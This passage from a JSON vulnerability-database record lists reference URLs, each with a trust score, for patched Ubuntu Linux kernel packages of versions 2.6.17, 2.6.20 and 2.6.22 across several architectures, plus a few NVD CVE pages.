      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.42_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4997"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-sparc64_2.6.22-14.47_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.33_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.42.dsc"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-xen_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-14.47_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5093"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-386_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-ume_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-14.47_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6058"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
